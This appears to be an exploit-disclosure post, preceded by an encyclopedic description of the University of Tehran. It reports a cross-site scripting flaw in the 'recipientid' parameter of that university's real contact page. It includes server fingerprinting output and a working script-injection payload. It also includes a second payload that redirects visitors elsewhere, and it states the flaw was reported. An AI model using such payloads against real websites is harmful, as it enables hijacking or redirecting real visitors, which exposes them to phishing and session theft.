The University of Tehran, also known as Tehran University and UT, is Iran's oldest modern university. It is also Iran's most prestigious university. Based on its historical, socio-cultural, and political pedigree, as well as its research and teaching profile, UT has been nicknamed "The mother university of Iran" and it is the symbol of higher education in Iran. It is almost always ranked as the best university in Iran in national and international rankings. [+] In the name of god [+] Exploit Title : University of Tehran Cross-Site-Scripting Vulnerability [+] Exploit Author : 4TT4CK3R [+] Tested on : All Platforms [+] Date : 2017/08/23 [+] Home Page : http://ut.ac.ir/ [+] Some Info : [--]4TT4CK3R@GrayBoy:~$ curl -I http://ut.ac.ir [--]HTTP/1.1 302 Found [--]Date: Mon, 21 Aug 2017 15:02:36 GMT [--]Server: Apache/2.4.7 (Ubuntu) [--]Accept-Ranges: bytes [--]X-Powered-By: PHP/5.5.9-1ubuntu4.22 [--]Location: http://ut.ac.ir/fa [--]Cache-Control: max-age=0 [--]Expires: Mon, 21 Aug 2017 15:02:36 GMT [--]Content-Type: text/html; charset=UTF-8 [--]Connection: close [+] Vulnerable Page : http://ut.ac.ir/fa/contactus [+] Parameter for request : recipientid [+] Payload : %22%22/%3E%3C%3C/ScrIpt%3E%3Cscript%3Ealert(%274TT4CK3R%27)%3C/script%3E [+] Redirection : And also we can redirect target to another website : [--] ""/><</ScrIpt><script>window.location="https://google.com";</script> [+] ScreenShot : http://uupload.ir/files/2iyw_1.png [+] Discovered by : 4TT4CK3R [++] This vulnerability reported to the target.